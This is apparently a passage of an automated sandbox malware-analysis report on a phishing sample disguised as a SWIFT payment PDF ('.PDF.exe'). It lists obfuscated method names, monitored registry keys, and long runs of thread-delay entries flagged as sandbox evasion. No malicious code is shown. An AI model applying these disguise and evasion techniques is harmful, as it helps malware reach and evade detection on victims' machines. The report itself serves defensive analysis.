Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, HKxMO2JJUh9Xie2wOrL.cs | High entropy of concatenated method names: 'd1lUCO2c2u', 'NOBUzv8kq3', 'kbwfNRuLal', 'GW2fJHkYfa', 'PpVf3AcO2q', 'cLmfwbRKUn', 'SjVfSJEyTW', 'dOGf9nNk8j', 'DRifleVKN8', 'udFfL5Oo0f'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, wYYTswJScuZEGg3uOyx.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gbDyMA1YiI', 'GJdyU9IqKl', 'MEKyf4mVgt', 'wIOyyfN2Kx', 'AtOyA5QFiF', 'vZBybivFWR', 'wLFycb6Wml'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, GAk8ihtBa5W1IjF2oS.csHigh entropy of concatenated method names: 'FYGnlNxysf', 'xOVnGwpYl5', 'uPtnogQOkG', 'wwLoClvjtY', 'aKYozJjbJY', 'R7ZnNdLlUr', 'JatnJsa0pC', 'hYin31KGid', 'NIQnwmvcs1', 'SV3nSjlQLG'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, nQ7wrtOUeqtYQkPrOP.csHigh entropy of concatenated method names: 'Db8M4R0Hmp', 'js1MrA49jI', 'mmEMgHZsD4', 'ey6MxSPn8a', 'SagMHB3QYe', 'E71M1JAk3J', 'P93Mt0F4Lm', 'rCZMeJevIs', 'wQjMITYJHi', 'thmMYtBfS2'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, jU4QiGWcKqOGdqRA7H.csHigh entropy of concatenated method names: 'ToString', 'JDDqsYAahk', 'KKNqrG6Nbk', 'eyaqg4SsuQ', 'DvxqxgJ5Ir', 'PRxqHlU6ba', 'Rbnq1lbe6o', 'HZ9qtieX1g', 'KLHqevNFOc', 'MMWqINxIs6'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, Cvg56jCKLuGN9qnAmj.csHigh entropy of concatenated method names: 'RgOUGfp5YA', 'TOKU0BTw5s', 'tDUUoFBWiH', 'tB3UndQGbT', 'XUgUM2tVr2', 'JlnUvhVJvT', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, A2a2n9jgNGDhXoeYbl.csHigh entropy of concatenated method names: 'cE6MTvx2ta', 'vCaMhMjhRn', 'vt3MMaK9LQ', 'BUqMfXOvPA', 'roDMA5BIcD', 'ywxMcw37ol', 'Dispose', 'eMHFlFOBhO', 'UntFLiu6c3', 'dJ7FGj1rer'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, rMB5jG4QCpHfhvHovr.csHigh entropy of concatenated method names: 'OLTo90hjoo', 'REXoL2T6rL', 'P4qo0uPjd0', 'SI3ontHvC4', 'IyJovVxWkW', 'zZY0uuorgs', 'Eq30Bh4von', 'YiU0jZKtRQ', 'b8T0EDQK0o', 'VDZ0OuosmW'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, YiBkDligENmtVURwGC.csHigh entropy of concatenated method names: 'scTh7SGolb', 'Xx0h6MOZ07', 'ToString', 'aENhlTZeKH', 'jyuhLBCgiK', 'jTphGyDTBk', 'gRoh0OjOJj', 'BViho7rOfC', 'E66hnnSU1J', 'vLohvF7A5U'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, HBAAU6Zc1wT5mNwguv.csHigh entropy of concatenated method names: 'aCq0R2Hdxh', 'BMd0KHl48O', 'B9yGgV0XAt', 'KcmGxvgcVX', 'mFRGHggDcH', 'bNKG1wmEBF', 'IMTGtpdEMY', 'JZDGe6h5Yp', 'vYJGIAD3LR', 'jRWGYHTbFH'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, BQD6XWzbHEffuGqKR0.csHigh entropy of concatenated method names: 'kWWUmXHWUK', 'EO6UQmevYC', 'y4MUkWs9ud', 'JuOU4RFqFs', 'Oc4UrXXNov', 'r32Ux4UiCt', 'l9BUHqvXWB', 'lW3Uct9Jgs', 'EwBU8ECyLh', 'TpfUpLLUFI'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, fqhchwBgphISV1i3HW.csHigh entropy of concatenated method names: 'VYQhEmLMc9', 'TEKhCrGr8Y', 'UmaFNdJCOs', 'mWfFJGITvM', 'u6Fhsurqgu', 'rENh2Z6wfJ', 'fvehafKeIe', 'JTjhVsxBvF', 'qqKhP29f31', 'r44hW3AKFM'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, OPPpkDkjPXW6MvfLTh.csHigh entropy of concatenated method names: 'A2TGDtB9BW', 'KrmGm5PerZ', 'c77GQ1Dy7x', 'OGpGkRQFOr', 'YAoGTLR4SH', 'EP8Gq7bLyK', 'dIFGh1gVEB', 'kH2GFZuGhN', 'FPmGMn3D0a', 'iy5GUfSIfn'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, QN8LhUv7Bq01pTrSfL.csHigh entropy of concatenated method names: 'ittw9bmqBI', 'LDiwlJ1Vx8', 'YHgwLwCWp3', 'auKwGRkx7u', 'p5Pw0j2qef', 'F6IwosHllH', 'xQ2wngomO6', 'kVXwvrqq3h', 'YGDw5iL08O', 'bflw7BhXQS'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, sphcUmQKOWkVh4kjRk.csHigh entropy of concatenated method names: 'QB7LVw5mcx', 'VHkLPstL5w', 'f46LWYkC3h', 'xalLiyHD7F', 'OFwLuDBS5l', 'rYwLBSZZqS', 'PakLjIbFlF', 'S6WLEYkL0x', 'R8aLOx6tjA', 'F0QLCrFaAo'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, brR4fRI3jDiiDKeLQt.csHigh entropy of concatenated method names: 'Bcqn8NaLmS', 'PXRnpmqrv8', 'UlanX3i8Pc', 'R1TnDVFf9p', 'QBDnROCfJE', 'ga8nmFSM1Y', 'YapnKUuusg', 'OnOnQavg4D', 'lAPnkaVMYu', 'cIonZQjllw'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, OP5y05SJkYcDfUh8rR.csHigh entropy of concatenated method names: 'z1UJnphcUm', 'COWJvkVh4k', 'AjPJ7XW6Mv', 'tLTJ6hrBAA', 'awgJTuvMMB', 'ljGJqQCpHf', 'EnneT0fmsqaX4YKcF2', 'r0Mi8UD0tZdAXtvaN8', 'sCAJJZoexA', 'W62Jw9yxDR'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, wlMmXiamMflVnhmrlw.csHigh entropy of concatenated method names: 'wCldQyZ4kP', 'PnvdkTViGj', 'eDKd4HlZe1', 'SDrdrh6vR2', 'VuAdxSdsuM', 'SsddH75tVO', 'qsvdtoHgPa', 'W9SdeepSjO', 'kn3dYuHwGa', 'WdJdsHseQb'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, sFr5UQ3VBmJh4eof1E.csHigh entropy of concatenated method names: 'ng6Xj58xJ', 'KZRDLqdwD', 'Jv8mPhmsx', 'rGFKOhZW5', 'hL1kOjnnr', 'ksLZtM7Ro', 'e1YaOdGlHTresbxUDQ', 'DlDLl23ljtNNi3L0Jm', 'Q37FBm4g7', 'ICfU7HnKT'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, hv2DojJN0ku3NnWw1iq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'y9sUscGeVe', 'bdAU2lw3Pc', 'rQfUaRC3TA', 'aoUUVPCuYZ', 'S7lUPQn3U8', 'jNPUWxHSUg', 'bXEUioEja1'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, wPm8JEVKZAg6qnsJjZ.csHigh entropy of concatenated method names: 'iIWTY0T8MD', 'YwTT2GljJE', 'C5FTVH0ORo', 'VfpTPbZalW', 'onQTrA221k', 'yl7TgeByDM', 'E4WTxZwABU', 'xB8THXg2Bx', 'MBNT1m6CDK', 'EOJTtDqys8'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, VbT0MOLP8g50MBtTv3.csHigh entropy of concatenated method names: 'Dispose', 'hDhJOXoeYb', 'iwi3rtt17J', 'Mwxa1b5Qna', 'fV4JCS0v8D', 'p3XJzCQFZs', 'ProcessDialogKey', 'uv63NQ7wrt', 'seq3JtYQkP', 'GOP33Kvg56'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, HKxMO2JJUh9Xie2wOrL.csHigh entropy of concatenated method names: 'd1lUCO2c2u', 'NOBUzv8kq3', 'kbwfNRuLal', 'GW2fJHkYfa', 'PpVf3AcO2q', 'cLmfwbRKUn', 'SjVfSJEyTW', 'dOGf9nNk8j', 'DRifleVKN8', 'udFfL5Oo0f'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, wYYTswJScuZEGg3uOyx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gbDyMA1YiI', 'GJdyU9IqKl', 'MEKyf4mVgt', 'wIOyyfN2Kx', 'AtOyA5QFiF', 'vZBybivFWR', 'wLFycb6Wml'

                Hooking and other Techniques for Hiding and Protection

                Source: Possible double extension: pdf.exe Static PE information: Swift Copy TT USDUSD$23,401.PDF.exe
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 6716, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: 2AA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: 2C70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: 4C70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: 8FF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: 9FF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: A200000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: B200000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: BC00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: CC00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: DC00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: 1040000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: 2D10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599546Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599218Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 599000Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598672Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598343Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597797Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597672Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597562Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597453Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597343Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597234Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597125Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 597015Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596906Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596797Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 596672Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 596562
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 596453
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 596343
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 596231
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 596125
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 596015
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595906
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595796
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595687
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595578
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595468
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595358
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595250
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595140
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595031
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 594922
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 594812
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 594703
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 594593
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Window / User API: threadDelayed 2003
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Window / User API: threadDelayed 7855
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2004 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 6752 | Thread sleep count: 2003 > 30
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 6752 | Thread sleep count: 7855 > 30
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -598890s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -598672s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -598343s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -598125s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -597797s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -597672s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -597562s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -597453s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -597343s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -597234s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -597125s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -597015s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -596906s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -596797s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -596672s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -596562s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -596453s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -596343s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -596231s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -596125s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -596015s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -595906s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -595796s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -595687s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -595578s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -595468s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -595358s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -595250s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -595140s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -595031s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -594922s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -594812s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -594703s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe TID: 2308 | Thread sleep time: -594593s >= -30000s
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 599875
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 599765
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 599546
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 599437
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 599328
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 599218
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 599109
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 599000
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 598890
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 598781
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 598672
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 598562
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 598453
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 598343
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 598234
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 598125
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 598015
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 597906
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 597797
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 597672
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 597562
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 597453
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 597343
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 597234
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 597125
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 597015
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 596906
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 596797
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 596672
